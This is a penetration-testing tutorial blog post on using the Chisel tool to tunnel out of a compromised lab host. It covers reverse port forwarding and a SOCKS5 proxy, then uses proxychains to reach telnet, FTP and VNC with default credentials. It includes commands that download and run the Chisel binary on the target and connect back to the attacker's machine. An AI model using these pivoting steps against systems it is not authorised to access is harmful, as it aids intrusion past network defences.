A Detailed Guide on Chisel
Background of
Port forwarding:
Port forwarding in a
computer network, also known as port mapping of network address transition
(NAT), redirects a communication request from one address and port number
combination to another while packets traverse a network gateway such as a
firewall or a router. It is used to keep unwanted traffic off. A network
administrator uses one IP address for all external communications on the
internet while dedicating multiple servers with different IPS and ports
internally to do various tasks based on organization requirements.
Table
of content:
- Introduction to Chisel
- Establish a connection with the remote host
- Local port forwarding Example - 1
- Local Port forwarding Example - 2
- Establish Connection with SOCKS5 Proxy
- Configure SOCKS5 in proxychains4.conf file
- Banner grabbing of the remote host with proxychains
- Telnet Connection using proxychains
- FTP connection using proxychains
- VNC Viewer connection using proxychains
- Conclusion
Introduction to Chisel
Chisel is open-sourced tool written in Go (Golang)
language, mainly useful for passing through firewalls, though it can also be
used to provide a secure endpoint into your network. It is a fast TCP/UDP
tunnel, transported over HTTP and secured via SSH. In addition, it requires two
things to establish a connection between a remote host and the attacking box,
where the attacking box will act as the server and the remote host as a client.
Establish a connection with the remote host
We are establishing a connection with the remote
host with valid credentials. The remote host can be a target and tunneling
point for the next hop. If there is another hop we can connect with, then the
remote host will act as a routing point. We connected as the pentest
user with the host using SSH protocol which stands for secure socket shell and
transmits data in encrypted form. Once we connect with the remote host, we will
view the internal network status, which can be achieved using the following
commands.
-a all interface
-n show ip address
-t show tcp connections
-p show process id/name
netstat -antp
Installation
Chisel installation is straightforward in Kali
Linux as it comes with a distribution package. We can install it using the
below command.
apt install chisel
Local port forwarding Example - 1
In reverse port forwarding, it allows connecting to remote services hosted in an internal network. Here we are using a chisel utility to achieve our goal. It will require you to go through multiple steps. In the first step, we set up a reverse server in our base machine (Kali) by specifying a port number of 5000.
Once our Chisel server is ready and reverse
tunneling is enabled, we will be required to transfer a chisel binary to the
remote host. The chisel binaries can be downloaded from the official repository
based on the system architecture. All the latest available binaries can be
found by accessing the releases tab. As we will test it on a Linux system with
AMD64 architecture, we selected the highlighted one.
Download link: https://github.com/jpillora/chisel/releases
After cloning the repository, it will be saved in the downloads folder in zip file format. Next, we will unzip the file using the gunzip utility. As mentioned earlier, we require to transfer it to the target system to set up a chisel as a client. To transfer the file, we set up a python server in our local system, which will host our file on port 80.
gitclone
https://github.com/jpillora/chisel.git
gunzip chisel_1.7.7_linux_amd64.gz
python3 -m http.server 80
We
downloaded the chisel binary in the remote host's /tmp directory, where
everyone has full permission on files. Then we give full permission to file so
we can execute it. Suppose we do not give appropriate permission to file. In
that case, we cannot execute it as it is set only to read permission when we
download anything in the temp directory as a low-privileged user. To establish
a remote connection, we require a chisel server and a chisel client where the
chisel server is the Attacking box, and the chisel server will be the target
machine. As we have already set up a chisel server on port 5000 earlier,
we are establishing a connection with the server. In this example, we mentioned
chisel as a client and gave the server IP address and port number (5000).
We then mentioned an accessing port (4444) and localhost with a port
where HTTP service is hosted internally in the remote system.
wget
192.168.1.205/ chisel_1.7.7_linux_amd64
chmod 777 chisel_1.7.7_linux_amd64
./chisel_1.7.7_linux_amd64
client 192.168.68.141:5000 R:4444:localhost:8080
Local Port forwarding Example - 2
There is
another way to access the HTTP service using the attacker's IP address instead
of the loopback interface this time. We will be required to install a chisel in
the target machine to achieve the goal. In this example, we are using the
ubuntu system. As the chisel is written in Golang language, we need to install
Golang in the target system using the below command.
apt
install golang
Next, we
download a chisel from its official repository to install it in the target
system. Go build is an automatic build tool that aims to replace Make files for
simple projects written in the Go programming language. It creates a dependency
graph of all local imports and compiles them in the correct order using the GC
Go compiler. The ldflags
stands for linker flags and is used to pass in flags to the underlying linker
in the Go toolchain. The -s and -w linker flags are not strictly needed, but
they decrease the size of the resulting binary. By navigating the download
folder of the chisel, we simply installed it with the help of go build.
git clone
https://github.com/jpillora/chisel.git
apt
install golang
go build
-ldflags="-s -w"
Then we
set up a chisel server on port 5000 in the attacking box as in the previous
example. In the last example, we accessed it from the attacking box loopback
interface, connecting to the service hosted in the remote internal network.
This time we will access the HTTP service on port 8888 on the attacker side.
Ubuntu machine, our client, will establish a connection with the remote server
(192.168.1.205) and port 5000. Once a tunnel is created, it will allow
accessing the HTTP service hosted in loopback (127.0.0.1) on remote port 8888.
./chisel
client 192.168.1.205:5000 R:8888:localhost:8080
When a connection is established with the chisel server, we can access
the HTTP service from the attacking box on port 8888.
Establish
Connection with SOCKS5 Proxy
During the internal assessment, we may come across when we compromise a system,
and that system is communicating with another system using a different adaptor
or a different subnet. It can be checked using ipconfig/ifconfig, where we can
view if that system is connected to a different network via a different
adapter. In such scenarios, local port forwarding will not work, and we have to
identify which ports are open for the outbound traffic. As shown in the
screenshot below, we could not establish a connection with the remote host.
To overcome this
issue, we have to go through multiple steps. First, we set up a chisel server
in the attacking box on port 8000.
Then we establish a connection with the
chisel server from the ubuntu box mentioning remote access on socks proxy. Just
like most other proxy types, SOCKS proxies hide the client's IP address and
serve when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web
data. However, they are mainly used to facilitate communication with websites
with firewalls and limit regular client access. All communication can be done
on SOCKS5 proxy using utilities such as proxychains or proxychain4.
-p: listening port of the server (attacking
box)
--socks5: start an internal SOCKS4/SOCKS5 proxy
--reverse: allows reverse port forwarding
We can also access an individual target's port using the command below.
We connect with the server hosted in the Attacking machine and then access the
target service via a tunnel.
Also, we can specify socks proxy while setting up the chisel server. In
the below example, we have set up a chisel server on port 9001 using the socks5
proxy.
All the above setup is done at the system level, but how will the
browser know we want to access HTTP service? So, we configured it in the
browser as well. Otherwise, we cannot browse any HTTP or H TTPS services. To do
that, we manually configured our browser by navigating settings as proxy SOCKS
and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such
as SOCKS4 or SOCKS5, which depend on the version we are using. In this example,
we are using SOCKS5 and port number 1080. And no proxy for the loopback
interface. It can also be done using the foxyproxy addon available in Mozilla
Firefox.
Now we can
access the services without any issues. We can verify accessing the target HTTP
service where the request will send via a proxy.
Configure
SOCKS5 in proxychains4.conf file
If proxychains4 is not configured for the socks5 proxy, we can make an entry in its configuration file using any text editor. The configuration file is located in the /etc as proxychains4.conf.
To
edit the configuration file, we need to comment socks4 proxy if that is
configured by default and add socks5 on the loopback interface with the port
number. We can use any port, but in this example, we use port 1080.
Banner grabbing of the remote host with proxychains
Let's grab the banner of ports 21, 23, and 5900. Port 21 belongs to the
File transfer protocol, 23 to the telnet, and 5900 to the VNC server. FTP
transfers files from different sources to different destinations, and the
telnet is used for the remote connection in the command line interface. On the
other hand, VNC can be used to establish a GUI-based remote connection. To grab
the banners or access the remote host, we have to use proxychains before using
any command so the request will be made from the tunnel that we created. From
the output, it is confirmed that all three ports are open. In our command, we
have used -zvn options that stand for:
-n Do not do DNS or service lookups on specified addresses, hostnames,
or ports.
-v Have nc give more verbose output.
-z Specifies that nc should only scan for listening daemons without
sending any data to them.
proxychains nc -zvn 192.168.146.128 21 23 5900
Telnet Connection using proxychains
Telnet is a remoting protocol that does not encrypt the data while
transmitting. It transmits data in a plain text format. Let's establish a
telnet connection with valid credentials msfadmin/msfadmin. As expected, we
successfully established a remote connection with the remote host using telnet
protocol.
proxychains telnet
192.168.146.128
FTP connection using proxychains
FTP (File Transfer Protocol) is a network protocol
for transmitting files between computers over Transmission Control
Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP
is considered an application layer protocol. Let's connect with the same
credentials we used in telnet. We connected to ftp successfully, and with ls
command, we can list the available file in the directory.
proxychains
ftp 192.168.146.128
VNC
Viewer connection using proxychains
In the last example, we will connect with the VNC viewer.
VNC Viewer is used for local computers and mobile devices you want to control
from. A device such as a computer, tablet, or smartphone with installed VNC
Viewer software can access and control a computer in another location. This
service runs in its default port, 5900. To establish a connection with VNC, we
can use proxychains using the vncviewer utility and the remote IP address, and
we will receive a GUI-based interface.
proxychains
vncviewer 192.168.146.128
Conclusion:
We have explored chisel briefly, which will make our
Internal assessment much easier, especially when we come across port forwarding.
We have explored multiple techniques to establish a remote session using a
chisel with and without socks5 proxy. Also, we have explored proxychains role
in a tunneled connection. I hope you have learned something new today. Happy
hacking!
Author: Subhash Paudel is a Penetration Tester, Red Teamer,
and a CTF player who has a keen interest in various technologies and love to
explore more and more. Additionally, he is a technical writer at Hacking
articles. Contact here: https://au.linkedin.com/in/subhash-paudel-a021ab207,
https://twitter.com/subhashpaudel94
0 comments:
Post a Comment